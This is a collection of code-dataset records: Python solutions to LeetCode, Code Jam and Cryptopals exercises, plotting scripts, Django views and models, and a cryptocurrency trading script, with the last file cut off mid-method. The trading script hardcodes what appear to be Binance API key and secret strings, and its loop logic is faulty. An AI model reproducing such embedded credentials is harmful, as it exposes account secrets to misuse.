+{"seq_id":"164705123","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n length = len(nums)\n if length == 1:\n return nums[0]\n last_max_sum = nums[0]\n max_subarray_sum = nums[0]\n for i in range(1, length):\n last_max_sum = max(last_max_sum+nums[i], nums[i])\n max_subarray_sum = max(max_subarray_sum, last_max_sum)\n return max_subarray_sum\n","sub_path":"leetcode/053.py","file_name":"053.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174131965","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph = literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\nplayer = Player(world.starting_room)\n\ntraversal_path = []\n\n\n# move player helper function\ndef move_player(direction):\n player.travel(direction)\n traversal_path.append(direction)\n\n# * Recursive DFT\n\n\ndef find_path_rec(visited=None, previous=None, move=None):\n # visited dict starts as none, previous room starts as none, move input starts as none\n curr_id = player.current_room.id\n connected_rooms = player.current_room.get_exits()\n # * enable easily determining what room the player came from -- previous room is the room opposite Move\n reverse_dirs = {\n 'n': 's',\n 's': 'n',\n 'e': 'w',\n 'w': 'e'\n }\n\n # * instantiates visited set at first\n if visited == None:\n visited = {}\n\n # * create empty set in visited when curr_id not in visited\n if curr_id not in visited:\n visited[curr_id] = {}\n\n # * handles movement command -- if the function recieves a move, the curr_id is assigned to the move applied to the previous room\n if move is not None:\n visited[previous][move] = curr_id\n\n # * the previous room is the room at the opposite-provided direction\n # ! handle after checking move\n if previous is not None:\n visited[curr_id][reverse_dirs[move]] = previous\n\n # * determines if there are remaining neighbors to be visited and recursively visits\n if len(visited[curr_id]) < len(connected_rooms):\n for direction in connected_rooms:\n if direction not in visited[curr_id]:\n move_player(direction)\n find_path_rec(visited, previous=curr_id, move=direction)\n\n # * If the player has visited fewer than total rooms move the player backwards\n if len(visited) < len(room_graph):\n move_player(reverse_dirs[move])\n\n\n# ! executes recursive function to determine path\nfind_path_rec()\n\nvisited_rooms = set()\nplayer.current_room = world.starting_room\n\n\n# * Allows player to be controlled by dft function\n# Moves player according to traversal_path\nfor direction in traversal_path:\n player.travel(direction)\n current_room = player.current_room\n visited_rooms.add(current_room)\n\nprint('traversal_path: ', traversal_path)\n\nif len(visited_rooms) == len(room_graph):\n print(\n f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\nplayer.current_room.print_room_description(player)\nwhile True:\n cmds = input(\"-> \").lower().split(\" \")\n if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n player.travel(cmds[0], True)\n elif cmds[0] == \"q\":\n break\n else:\n print(\"I did not understand that command.\")\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"298437830","text":"from __future__ import print_function\nimport numpy as np\nfrom spt3g import core\n\nclass PlotG3MapHistograms(object):\n def __init__(self, g3_map_key, frame_type, save_folder, save_tag, n_bins, \n log_y = False, log_x= False):\n self.g3_map_key = g3_map_key\n self.frame_type = frame_type\n self.save_folder = save_folder\n self.save_tag = save_tag\n self.bins = n_bins\n self.log = log_y\n \n self.log_x = log_x\n \n self.scan_num = 0\n\n def __call__(self, frame):\n import pylab as pl\n if self.frame_type != frame.type:\n return\n mp = frame[self.g3_map_key]\n vals = np.nan_to_num(np.asarray(mp.values()))\n pl.clf()\n\n if self.log_x:\n print(min(vals), max(vals))\n start = np.log(min(vals[np.where(vals > 0)]))/np.log(10)\n stop = np.log(max(vals))/np.log(10)\n bins = np.logspace(start - 1, stop + 1, num = self.bins)\n else:\n bins = self.bins\n #import pdb; pdb.set_trace()\n pl.hist(vals, bins = bins, log=self.log)\n\n if self.log_x:\n pl.semilogx()\n\n pl.savefig('%s/%s_%d.png' % (self.save_folder, self.save_tag, self.scan_num ))\n self.scan_num += 1\n\n\nclass ReportStatistics(object):\n def __init__(self, type, labels, funcs, also_plot = True, plot_dir = '.'):\n assert(len(labels) == len(funcs))\n\n self.type = type\n self.labels = labels\n self.funcs = funcs\n self.also_plot = also_plot\n self.vals = [ [] for l in labels]\n self.plot_dir = plot_dir\n def __call__(self, frame):\n if frame.type == self.type:\n for i in range(len(self.labels)):\n self.vals[i].append( self.funcs[i](frame))\n if frame.type == core.G3FrameType.EndProcessing:\n for i in range(len(self.labels)):\n print(self.labels[i],\":\")\n print(self.vals[i])\n print('\\n\\n')\n if self.also_plot:\n import pylab as pl\n pl.clf()\n pl.ylabel(self.labels[i])\n pl.xlabel('Frame')\n pl.plot(self.vals[i])\n pl.savefig(self.plot_dir + '/' + self.labels[i] + '.png')\n","sub_path":"util/python/datavis.py","file_name":"datavis.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"135019823","text":"from itertools import cycle\n\ndef byte_xor(A, B):\n\tzip_list = zip(A, cycle(B)) if len(A) > len(B) else zip(cycle(A), B)\n\treturn bytes([_a ^ _b for _a, _b in zip_list])\n\ndef get_character_score(character):\n\tkeys = {\n\t'a': 0.08167,\n 'b': 0.01492,\n 'c': 0.02782,\n 'd': 0.04253,\n 'e': 0.12702,\n 'f': 0.02228,\n 'g': 0.02015,\n 'h': 0.06094,\n 'i': 0.06094,\n 'j': 0.00153,\n 'k': 0.00772,\n 'l': 0.04025,\n 'm': 0.02406,\n 'n': 0.06749,\n 'o': 0.07507,\n 'p': 0.01929,\n 'q': 0.00095,\n 'r': 0.05987,\n 's': 0.06327,\n 't': 0.09056,\n 'u': 0.02758,\n 'v': 0.00978,\n 'w': 0.02360,\n 'x': 0.00150,\n 'y': 0.01974,\n 'z': 0.00074,\n ' ': 0.13000}\n\tif(character in keys):\n\t\treturn keys[character]\n\treturn 0\n\n\ndef get_best_english_string(_bytes):\n\tresult = {\"key\":' ', \"score\":0, \"text\":' '}\n\tfor key in range(32,127):\n\t\txor_bytes = byte_xor(_bytes, (key).to_bytes(2, byteorder='big'))\n\t\ttext = xor_bytes.decode(\"utf-8\") \n\t\ttext_score = get_english_score(text)\n\t\tif text_score > result[\"score\"]:\n\t\t\tresult[\"key\"] = key\n\t\t\tresult[\"score\"] = text_score\n\t\t\tresult[\"text\"] = text\n\treturn result\n\ndef get_english_score(text):\n\ttext = text.lower()\n\ttext_scores = []\n\tfor character in text:\n\t\ttext_scores.append(get_character_score(character))\n\treturn sum(text_scores)\n\n\ndef main():\n print(get_character_score('a') + get_character_score('b') + get_character_score('c'))\n print(get_english_score(\"abc\"))\n _bytes = bytes.fromhex(\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\")\n print(get_english_score(byte_xor(_bytes, b'X').decode(\"utf-8\")))\n print(get_english_score(byte_xor(_bytes, bytes(b'z')).decode(\"utf-8\")))\n\nif __name__ == '__main__':\n main()\n","sub_path":"05.Security/tasks/cryptopals-challanges/Python/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"449140343","text":"def solve(str_number):\n num = int(str_number)\n \n if num == 0:\n return \"INSOMNIA\" \n \n result = num\n \n digits = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n \n \n while True:\n str_result = str(result)\n digits = [d for d in digits if d not in str_result]\n if len(digits) == 0:\n return str_result\n else:\n result += num\n\n\n# Read file\nwith open('input.txt') as f:\n content = f.readlines()\n\nf_output = open(\"output.txt\", \"wb\")\nfor i in range(1, int(content[0]) +1):\n f_output.write(\"Case #\" + str(i) + \": \" +solve(content[i]) + \"\\r\\n\");\nf_output.close()\n\n\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Kostadinov_ProblemACountingSheep.py","file_name":"16_0_1_Kostadinov_ProblemACountingSheep.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"333691293","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport MDAnalysis\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\nparams = {'legend.fontsize': 8,\r\n 'legend.handlelength': 2}\r\nplt.rcParams.update(params)\r\n\r\nz,h1,h2,h3,h4,h5,h6,h7,h8,h9,h10,h11,h12,h13,h14,h15,h16,h17,h18,h19,h20,h21 = [],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\r\n\r\nwith open(r\"C:\\Users\\emfla\\Desktop\\CANES_2019\\research-project-assignment\\umbrella-sampling-data\\hairpin1_pulling_umbrella\\b=20\\histo_data.xvg\") as f:\r\n reader = csv.reader(f,delimiter = \"\\t\")\r\n for line in reader:\r\n a = np.transpose(line)\r\n z = np.append(z,a[0])\r\n h1 = np.append(h1,a[1])\r\n h2 = np.append(h2, a[2])\r\n h3 = np.append(h3, a[3])\r\n h4 = np.append(h4, a[4])\r\n h5 = np.append(h5, a[5])\r\n h6 = np.append(h6, a[6])\r\n h7 = np.append(h7, a[7])\r\n h8 = np.append(h8, a[8])\r\n h9 = np.append(h9, a[9])\r\n h10 = np.append(h10, a[10])\r\n h11 = np.append(h11, a[11])\r\n h12 = np.append(h12, a[12])\r\n h13 = np.append(h13, a[13])\r\n h14 = np.append(h14, a[14])\r\n h15 = np.append(h15, a[15])\r\n h16 = np.append(h16, a[16])\r\n h17 = np.append(h17, a[17])\r\n h18 = np.append(h18, a[18])\r\n h19 = np.append(h19, a[19])\r\n h20 = np.append(h20, a[20])\r\n h21 = np.append(h21, a[21])\r\n \r\n\r\nif h1[0]!=float: \r\n z = np.array(z,dtype=float)\r\n h1 = np.array(h1,dtype=float)\r\n h2 = np.array(h2,dtype=float)\r\n h3 = np.array(h3,dtype=float)\r\n h4 = np.array(h4,dtype=float)\r\n h5 = np.array(h5,dtype=float)\r\n h6 = np.array(h6,dtype=float)\r\n h7 = np.array(h7,dtype=float)\r\n h8 = np.array(h8,dtype=float)\r\n h9 = np.array(h9,dtype=float)\r\n h10 = np.array(h10,dtype=float)\r\n h11 = np.array(h11,dtype=float)\r\n h12 = np.array(h12,dtype=float)\r\n h13 = np.array(h13,dtype=float)\r\n h14 = np.array(h14,dtype=float)\r\n h15 = np.array(h15,dtype=float)\r\n h16 = np.array(h16,dtype=float)\r\n h17 = np.array(h17,dtype=float)\r\n h18 = np.array(h18,dtype=float)\r\n h19 = np.array(h19,dtype=float)\r\n h20 = np.array(h20,dtype=float)\r\n h21 = np.array(h21,dtype=float)\r\n\r\n\r\nhistos = [h1,h2,h3,h4,h5,h6,h7,h8,h9,h10,h11,h12,h13,h14,h15,h16,h17,h18,h19,h20,h21]\r\n\r\nplt.figure()\r\nfor i in range(len(histos)):\r\n plt.plot(z,histos[i],lw=2)\r\nplt.xlabel('$z$ ($nm$)')\r\n#plt.xlim(1.2,4.2)\r\nplt.ylim(0)\r\nplt.ylabel('Count')\r\nplt.savefig('hairpin_histo.png')\r\nplt.show()\r\n\r\ndef return_intersection(hist_1,hist_2):\r\n minima = np.minimum(hist_1,hist_2)\r\n intersection = np.true_divide(np.sum(minima),np.sum(hist_2))\r\n return intersection\r\n\r\nfraction = []\r\nfor i in range(len(histos)-1):\r\n fraction.append(return_intersection(histos[i],histos[i+1]))\r\n \r\nfraction_2 = []\r\nfor i in range(len(histos)-2):\r\n fraction_2.append(return_intersection(histos[i],histos[i+2]))\r\n\r\nplt.clf()\r\nplt.figure()\r\nplt.plot(fraction,label='Fractional overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.3173,35),'k--',label=r'$1\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0455,35),'r--',label=r'$2\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0027,35),'g--',label=r'$3\\sigma$ overlap')\r\nplt.xlim(0,20)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'Histogram pairs ($x$, $x+1$)')\r\nplt.ylabel(r'Fractional first neighbour overlap')\r\nplt.savefig('hairpin_first_overlap.png')\r\nplt.show()\r\n \r\nplt.clf()\r\nplt.figure()\r\nplt.plot(fraction_2,label='Fractional overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.3173,35),'k--',label=r'$1\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0455,35),'r--',label=r'$2\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0027,35),'g--',label=r'$3\\sigma$ overlap')\r\nplt.xlim(0,20)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'Histogram pairs ($x$, $x+2$)')\r\nplt.ylabel(r'Fractional second neighbour overlap')\r\nplt.savefig('hairpin_second_overlap.png')\r\nplt.show()\r\n \r\n'''\r\ndef histogram_overlap(h1,h2):\r\n sm = 0.0\r\n for i in range(len(z)):\r\n sm += min(h1[i],h2[i])\r\n return sm\r\ndef total_area(h1,h2):\r\n a = 0.0\r\n for i in range(len(z)):\r\n a += max(h1[i],h2[i])\r\n return a\r\n\r\nfraction = []\r\nfor i in range(len(histos)-1):\r\n fraction.append(histogram_overlap(histos[i],histos[i+1])/total_area(histos[i],histos[i+1]))\r\n \r\nfraction_2 = []\r\nfor i in range(len(histos)-2):\r\n fraction_2.append(histogram_overlap(histos[i],histos[i+2])/total_area(histos[i],histos[i+2])) \r\n''' ","sub_path":"backup/overlap_hairpin.py","file_name":"overlap_hairpin.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"236619258","text":"\"\"\"\nRegular expressions are terrible, tedious, terrible things.\n\"\"\"\nimport re \n\n\ndef like_scanf(s, sep=\"\\s*\"):\n \"\"\" Convert a 'scanf()' style string to a regex \"\"\"\n mapping = \\\n {\n r\"%f\" : r\"[-+]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?\",\n r\"%d\" : r\"[-+]?\\d+\",\n }\n valid = \"|\".join(mapping.keys())\n fmtstr = re.findall(valid, s)\n fmtlst = [mapping[x] for x in fmtstr]\n return sep.join(fmtlst)\n","sub_path":"realtime-graph-follow/webserver/lineparse.py","file_name":"lineparse.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"127169621","text":"from django.shortcuts import render\nfrom .form import ContactForm\nfrom .models import Contact\n# Create your views here.\ndef contact(request):\n form = ContactForm(request.POST or None)\n if form.is_valid():\n obj = Contact.objects.create(**form.cleaned_data)\n print(form.cleaned_data)\n form = ContactForm()\n context = {\n \"title\": \"Contact Us\",\n \"form\": form\n }\n return render(request, \"form.html\",context)","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"61593064","text":"import pandas as pd\nimport requests\nfrom datetime import datetime\nfrom datetime import timedelta\nimport easygui\nimport time\nfrom binance.client import Client\nimport array\nimport tulipy as ti\n\n\n\n\nclient = Client('1XGCXOq8RCHuKA0O322OHahi0Kg0KsSHsG4ai4Gbp7MmaLFwVEOxGoZ2G1KSjEAS','207ia9nrYf8OF3LDXjMPUShYxEDAQWUwJBxv1wzHUDmswHWlU1udgCHc7xxwyTiK')\ncryptoCount = 1\n\narr = array.array('i',[])\nsmall = 60\nmedium = 540\nlarge = 960\ndef find(total, smallavgPrice = 0, mediumavgPrice = 0, largeavgPrice = 0):\n BTCUSDTPrice = requests.get(\"https://api.binance.com/api/v1/ticker/price?symbol=ALGOBTC\")\n arr.insert(total, int(float(BTCUSDTPrice.json()['price'])))\n count = len(arr)\n if (count > small):\n for i in range(small):\n smallavgPrice = smallavgPrice + arr[count - 1 - i]\n\n #print(\"small: \",smallavgPrice/15)\n if (count > medium):\n for i in range(medium):\n mediumavgPrice = mediumavgPrice + arr[count - 1 - i]\n\n #print(\"medium :\",mediumavgPrice / 30)\n if (count > large):\n for i in range(large):\n largeavgPrice = largeavgPrice + arr[count - 1 - i]\n\n #print(\"large: \",largeavgPrice / 60)\n\n if (smallavgPrice > largeavgPrice and smallavgPrice > mediumavgPrice and count >= medium):\n\n print(\"Buy\")\n elif (cryptoCount > 0 and smallavgPrice <= mediumavgPrice and count >= medium):\n\n print(\"Sell\")\n time.sleep(900)\n find(total + 1)\n\n\nfind(0)\n","sub_path":"Simple Moving Average Method Conintues Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"601086852","text":"'''\nGiven an unsorted array return whether an increasing subsequence of length 3 exists or not in the array.\n\nFormally the function should:\nReturn true if there exists i, j, k\nsuch that arr[i] < arr[j] < arr[k] given 0 ≤ i < j < k ≤ n-1 else return false.\nYour algorithm should run in O(n) time complexity and O(1) space complexity.\n\nExample\nGiven [1, 2, 3, 4, 5],\nreturn true.\n\nGiven [5, 4, 3, 2, 1],\nreturn false.\n'''\nclass Solution:\n \"\"\"\n @param nums: a list of integers\n @return: return a boolean\n \"\"\"\n #time: O(n), space O(n)\n # def increasingTriplet(self, nums):\n # if len(nums) < 3: return False\n \n # left_min = [0] * len(nums)\n # lmin = nums[0]\n # for i, n in enumerate(nums):\n # lmin = min(lmin, n)\n # left_min[i] = lmin\n \n # right_max = [0] * len(nums)\n # rmax = nums[-1]\n # for i in range(len(nums)-1, -1, -1):\n # rmax = max(nums[i], rmax)\n # right_max[i] = rmax\n \n # for i in range(1, len(nums)-1):\n # if left_min[i-1] < nums[i] < right_max[i+1]: return True\n # return False\n def increasingTriplet(self, nums):\n small = big = float('inf')\n for n in nums:\n if n <= small: small = n\n elif n <= big: big = n\n else: return True\n return False\n","sub_path":"leetcode/increasingTriplet.py","file_name":"increasingTriplet.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"373150875","text":"import sys\n\n\ntest_case = open(sys.argv[1], 'r')\nfor test in test_case:\n line = test.strip().split(' ')\n new_line = ''\n x = int(line[0])\n y = int(line[1])\n n = int(line[2])\n\n for i in range(1, n+1):\n to_append = ''\n if i % x == 0 and i % y == 0:\n to_append = 'FB'\n elif i % x == 0:\n to_append = 'F'\n elif i % y == 0:\n to_append = 'B'\n else:\n to_append = str(i)\n\n new_line = new_line + to_append + ' '\n\n print(new_line.strip())\ntest_case.close()\n\n","sub_path":"solved/fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"316960344","text":"import utils\nimport classifiers\nimport numpy as np\n\nfilename = '../data/PolySVM_Normalized.txt'\n\ndef get_poly_function(c, d):\n def poly_function(x1, x2):\n value = x1.T @ x2\n value = value + c\n value = value ** d\n return value\n return poly_function\n\nif __name__ == '__main__':\n dataset = utils.load_train_data()\n dataset = utils.normalize(dataset)\n _, folds = utils.kfold(dataset, n=3)\n outfile = open(filename, 'w')\n constants = [.5, 1, 3, 5]\n powers = [1, 2, 3]\n bounds = [.1, .5, 1]\n npca = [11, 10, 9, 8]\n w, v = utils.PCA(dataset)\n\n for power in powers:\n for constant in constants:\n for bound in bounds:\n for n in npca:\n vt = v[:, :n]\n poly_function = get_poly_function(power, constant)\n scores, labels = [], []\n for fold in folds:\n train, test = fold[0], fold[1]\n train, test = np.vstack((vt.T @ train[:-1, :], train[-1])), np.vstack((vt.T @ test[:-1, :], test[-1]))\n fold_labels = test[-1, :]\n labels.append(fold_labels)\n\n alphas = classifiers.DualSVM_Train(train, poly_function, bound=bound)\n train, alphas = utils.support_vectors(train, alphas)\n fold_scores = classifiers.DualSVM_Score(train, poly_function, alphas, test)\n scores.append(fold_scores)\n\n scores = np.concatenate(scores)\n labels = np.concatenate(labels)\n mindcf, optimal_threshold = utils.minDCF(scores, labels, prior_t=.5)\n # Ignore the first field, is just handy for sorting\n print(f\"{mindcf} |.| MinDCF: {mindcf:.4f} - PCA: {n} - Opt. Thr.: {optimal_threshold:.4f} - Power: {power:.4f} - Constant: {constant:.4f} - C: {bound:.4f}\", file=outfile)\n np.save(f'../data/PolySVM-Normalized-PCA{n}-C{constant}-POW{power}Scores.npy', scores)\n\n outfile.close()\n","sub_path":"code/PolySVM_Normalized.py","file_name":"PolySVM_Normalized.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"510805653","text":"#!/usr/bin/env python\n\nimport epitome as epi\n\ndef run(input_name):\n output = 'detrend'\n\n print('\\nAdding detrend module.')\n\n try:\n print('\\nSet detrend order:')\n polort = epi.utilities.selector_int()\n\n # if we messed any of these up, we return None\n except ValueError as ve:\n return '', None\n\n # otherwise we print the command and return it\n line = ('. ${{DIR_PIPE}}/epitome/modules/pre/detrend {input_name} {polort}').format(\n input_name=str(input_name),\n polort=str(polort))\n\n return line, output\n","sub_path":"assets/epitome/151012-spins/epitome/commands/detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"33711390","text":"from decimal import Decimal\nimport uuid\n\nfrom django.db import models\nfrom django.db.models import Sum, F\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom autoslug import AutoSlugField\nfrom filebrowser.fields import FileBrowseField\nfrom polymorphic.models import PolymorphicModel\n\nfrom . import settings as shop_settings\n\n\nPAYMENT_GATEWAYS_CHOICES = tuple(\n (g, shop_settings.SHOP_PAYMENT_GATEWAYS[g]['verbose_name'])\n for g in shop_settings.SHOP_PAYMENT_GATEWAYS\n)\n\n\nPRODUCT_ATTRIBUTE_VALUE_TYPE_CHOICES = (\n ('options', _('Options')),\n ('text', _('Text'))\n)\n\n\nclass Category(MPTTModel):\n title = models.CharField(_('title'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='title',\n blank=True, editable=True, unique=True\n )\n parent = TreeForeignKey(\n 'self', null=True, blank=True, related_name='children', db_index=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n published = models.BooleanField(_('published'), default=True)\n description = models.TextField(_('description'), default='', blank=True)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('category')\n verbose_name_plural = _('categories')\n\n class MPTTMeta:\n order_insertion_by = ('order',)\n\n @staticmethod\n def autocomplete_search_fields():\n return ('id__iexact', 'title__icontains') # nocov\n\n def save(self, *args, **kwargs):\n super(Category, self).save(*args, **kwargs)\n unpublished = Category.objects.filter(published=False)\n unpublished_descendants_pks = []\n for c in unpublished:\n unpublished_descendants_pks += c.get_descendants() \\\n .values_list('pk', flat=True)\n Category.objects.filter(pk__in=unpublished_descendants_pks) \\\n .distinct().update(published=False)\n self.__class__.objects.rebuild()\n\n def __str__(self):\n return ' > '.join(\n a.title for a in self.get_ancestors(include_self=True)\n )\n\n def get_subcategories(self):\n return self.get_children().filter(published=True)\n\n def get_products(self):\n return self.products.filter(published=True)\n\n def get_product_attributes(self):\n return self.product_attributes.filter(published=True)\n\n\nclass TaxRate(models.Model):\n title = models.CharField(_('title'), max_length=255)\n rate = models.DecimalField(\n _('rate [%]'), max_digits=16, decimal_places=4,\n validators=[\n MinValueValidator(Decimal(0)),\n MaxValueValidator(Decimal(100))\n ]\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('title',)\n verbose_name = _('tax rate')\n verbose_name_plural = _('tax rates')\n\n def __str__(self):\n return '{} ({}%)'.format(self.title, self.rate)\n\n\nclass Product(models.Model):\n title = models.CharField(_('title'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='title',\n blank=True, editable=True, unique=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n published = models.BooleanField(_('published'), default=True)\n featured = models.BooleanField(_('featured'), default=False)\n sale = models.BooleanField(_('on sale'), default=False)\n category = models.ForeignKey(\n Category, verbose_name=_('category'), related_name='products'\n )\n\n description = models.TextField(\n _('description'), default='', blank=True\n )\n\n attributes = models.ManyToManyField(\n 'ProductAttribute', verbose_name=_('attributes'), blank=True,\n through='ProductAttributeValue'\n )\n\n thumbnail = FileBrowseField(\n _('thumbnail'), max_length=255, blank=True, null=True,\n directory='shop/products', extensions=['.jpg', '.jpeg', '.gif', '.png']\n )\n\n net_price = models.DecimalField(\n _('net price'), max_digits=14, decimal_places=2, blank=True,\n validators=[MinValueValidator(Decimal(0))]\n )\n tax_rate = models.ForeignKey(\n TaxRate, verbose_name=_('tax rate'),\n help_text=_('Leaving this field empty means no tax is applied to net '\n 'price.'),\n null=True, blank=True\n )\n gross_price = models.DecimalField(\n _('gross price'), max_digits=14, decimal_places=2, blank=True,\n validators=[MinValueValidator(Decimal(0))]\n )\n\n stock = models.PositiveIntegerField(_('stock'), default=0, blank=True)\n infinite_stock = models.BooleanField(\n _('infinite stock'),\n help_text=_('Setting this option will make product available to '\n 'purchase regardless of the stock.'),\n default=False\n )\n\n sales_count = models.PositiveIntegerField(\n _('sales count'), default=0, blank=True\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('product')\n verbose_name_plural = _('products')\n\n def __str__(self):\n return self.title\n\n def as_dict(self):\n try:\n image = self.get_first_image_or_thumbnail() \\\n .version_generate('shop_thumbnail').url\n except (AttributeError, FileNotFoundError):\n image = ''\n data = {\n 'pk': self.pk,\n 'url': self.get_url(),\n 'title': self.title,\n 'image': image,\n 'net_price': float(self.net_price),\n 'tax_rate': float(self.get_tax_rate()),\n 'gross_price': float(self.gross_price)\n }\n return data\n\n def get_url(self):\n return reverse('shop:product', kwargs={\n 'category_slug': self.category.slug,\n 'product_slug': self.slug\n })\n\n def get_tax_rate(self):\n try:\n return self.tax_rate.rate\n except AttributeError:\n return 0\n\n def get_images(self):\n return self.images.filter(published=True)\n\n def get_first_image_or_thumbnail(self):\n try:\n return self.thumbnail or self.get_images()[0].image\n except IndexError:\n return None\n\n def is_available(self):\n return bool(self.stock) or self.infinite_stock\n\n def get_categories_breadcrumbs(self):\n return self.category.get_ancestors(include_self=True)\n\n def get_attributes(self):\n return ProductAttributeValue.objects.filter(\n product=self,\n attribute__published=True,\n attribute__categories=self.category\n )\n\n\nclass ProductImage(models.Model):\n product = models.ForeignKey(Product, related_name='images')\n image = FileBrowseField(\n _('image'), max_length=255, directory='shop/products',\n extensions=['.jpg', '.jpeg', '.gif', '.png']\n )\n published = models.BooleanField(_('published'), default=True)\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('image')\n verbose_name_plural = _('images')\n\n\nclass ProductAttribute(models.Model):\n name = models.CharField(_('name'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='name',\n blank=True, editable=True, unique=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n value_type = models.CharField(\n _('value type'), max_length=255,\n choices=PRODUCT_ATTRIBUTE_VALUE_TYPE_CHOICES, default='options'\n )\n categories = models.ManyToManyField(\n Category, verbose_name=_('categories'), blank=True,\n related_name='product_attributes'\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('product attribute')\n verbose_name_plural = _('product attributes')\n\n def __str__(self):\n return self.name\n\n def get_options(self):\n return self.options.all()\n\n\nclass ProductAttributeOption(models.Model):\n attribute = models.ForeignKey(\n ProductAttribute, verbose_name=_('attribute'), related_name='options'\n )\n value = models.CharField(_('value'), max_length=255)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('option')\n verbose_name_plural = _('options')\n\n def __str__(self):\n return self.value\n\n\nclass ProductAttributeValue(models.Model):\n product = models.ForeignKey(Product)\n attribute = models.ForeignKey(ProductAttribute)\n option = models.ForeignKey(ProductAttributeOption, null=True, blank=True)\n text_value = models.CharField(\n _('text value'), max_length=255, null=True, blank=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('attribute')\n verbose_name_plural = _('attributes')\n\n def __str__(self):\n 